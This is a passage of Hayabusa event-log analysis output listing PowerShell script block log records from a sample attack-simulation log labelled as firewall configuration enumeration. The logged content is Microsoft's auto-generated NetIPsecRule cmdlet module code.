Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw 
} } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.M",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"anagement.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' 
function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] 
[Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, Value",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
